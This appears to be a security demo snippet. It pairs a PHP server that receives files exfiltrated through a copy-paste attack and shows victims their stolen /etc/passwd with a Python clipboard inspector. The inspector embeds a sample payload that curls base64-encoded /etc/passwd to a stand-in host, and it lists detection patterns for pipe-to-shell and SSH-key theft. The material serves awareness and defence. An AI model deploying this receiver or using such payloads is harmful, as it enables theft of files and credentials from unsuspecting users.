Malicious Shell Copy Paste Demo
Authored by
Anton Sarukhanov
<?php
// Directory where the exfiltrated files land, one file per upload.
$pwnpath = '/home/anton/paste/pwns/';

// Page shown to the victim when they open the link the pasted command printed.
$lecture = <<<EOF
<!doctype html>
<html>
<head>
<title>pwnt</title>
</head>
<body>
<h2>you've been pwnt</h2>
<hr>
<p>
I just stole your /etc/passwd. That isn't too bad, it's just a list of users on your machine.. But I could just as easily have taken your <strong>SSH private key</strong>, <strong>SSL keys/certs</strong>, and <strong>any other data your account can read</strong>.
</p>
<p>
<strong>Or...</strong> I could have <em>written</em> data instead. Such as adding a new private key to your ~/.ssh/authorized_keys file, so that I could <strong>sneak in later and wreak havoc</strong>. In fact, are you sure I didn't? ;)
</p>
<p>
To see how that exploit was pulled off, read the source of <a href="http://antsar.rutgers.edu/paste">antsar.rutgers.edu/paste</a>
</p>
<hr>
<p>
Here's your /etc/passwd file, for proof:
</p>
<pre>
EOF;

$htmlfoot = <<<EOF
</pre>
</body>
</html>
EOF;

if (isset($_GET['d'])) {
    // Upload path: the pasted command sends the file base64-encoded in ?d=.
    // It is stored under a fresh id and the viewing URL is echoed back.
    $id = uniqid();
    if ($dec = base64_decode($_GET['d'])) {
        file_put_contents($pwnpath.$id, $dec);
        echo "http://antsar.rutgers.edu/paste/p.php?id={$id}";
    } else {
        echo "oops, nevermind";
    }
} elseif (isset($_GET['id'])) {
    // View path: only ids made of [A-Za-z0-9_-] are accepted, so the id
    // cannot escape $pwnpath with "../" or a slash.
    if (preg_match('/[^a-z_\-0-9]/i', $_GET['id'])) {
        die('invalid id');
    } else {
        $id = $_GET['id'];
        if (file_exists($pwnpath.$id)) {
            echo $lecture;
            echo file_get_contents($pwnpath.$id);
            echo $htmlfoot;
        } else {
            die('invalid id');
        }
    }
}
?>
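The receiver above only works because the victim's shell runs whatever the browser put on the clipboard, including a newline the page hid from view. The defender-side counterpart is to inspect clipboard text before it reaches a terminal. The following is an added example (my code, not part of the snippet or of antsar.rutgers.edu/paste) in Python rather than PHP because it runs on the client side: it flags characters that make a paste execute or hide content, and fragments of the exfiltration pattern this demo's `?d=` endpoint expects. The sample clipboard strings and the `example.invalid` host are constructed for the demo.

```python
import re
import unicodedata

# Constructed sample clipboard contents (not taken from the snippet).
# The second one is the shape of payload the p.php receiver above accepts:
# a hidden newline makes the first command run on paste, the file is
# base64-encoded into ?d=, and an invisible character trails the "clear".
SAMPLE_SAFE = "ls -la ~/Downloads"
SAMPLE_MALICIOUS = (
    "ls -la\n"
    "curl -s 'http://example.invalid/paste/p.php?d='\"$(base64 /etc/passwd)\" ; "
    "clear\u200b"
)

# Characters a terminal acts on but a browser renders as a single line.
EXECUTING_CHARS = {"\n": "newline", "\r": "carriage return"}

# Unicode "format" characters (category Cf) are invisible on screen,
# e.g. U+200B ZERO WIDTH SPACE.
def is_invisible(ch):
    return unicodedata.category(ch) == "Cf"

# Fragments typical of a copy-paste exfiltration one-liner.
EXFIL_PATTERNS = [
    (re.compile(r"\b(curl|wget)\b.*(base64|/etc/passwd|\.ssh/)"),
     "network client combined with encoding or a sensitive file"),
    (re.compile(r"\|\s*(sh|bash|zsh)\b"),
     "pipes downloaded content into a shell"),
    (re.compile(r";\s*(clear|reset)\b"),
     "clears the screen after running (hides what was executed)"),
]

def inspect_paste(text):
    """Return human-readable findings for clipboard text; empty list means nothing suspicious."""
    findings = []
    for ch, name in EXECUTING_CHARS.items():
        if ch in text:
            findings.append(f"contains a {name}: the shell would execute before you can review it")
    invisible = sorted({f"U+{ord(c):04X}" for c in text if is_invisible(c)})
    if invisible:
        findings.append("contains invisible characters: " + ", ".join(invisible))
    for pattern, why in EXFIL_PATTERNS:
        if pattern.search(text):
            findings.append(why)
    return findings

def is_safe_to_paste(text):
    """True when inspect_paste() raises no finding."""
    return not inspect_paste(text)

if __name__ == "__main__":
    for label, sample in (("safe", SAMPLE_SAFE), ("malicious", SAMPLE_MALICIOUS)):
        print(f"{label}: {'OK' if is_safe_to_paste(sample) else 'REVIEW'}")
        for finding in inspect_paste(sample):
            print("  -", finding)
```

The newline check is the one that matters most: bash 5.1 and later and recent zsh ship bracketed-paste mode, which keeps pasted newlines from being treated as Enter, so a paste lands on the prompt for review instead of running. The pattern list is deliberately narrow and only catches the shape of this particular demo; treat it as a starting point, not a filter to trust.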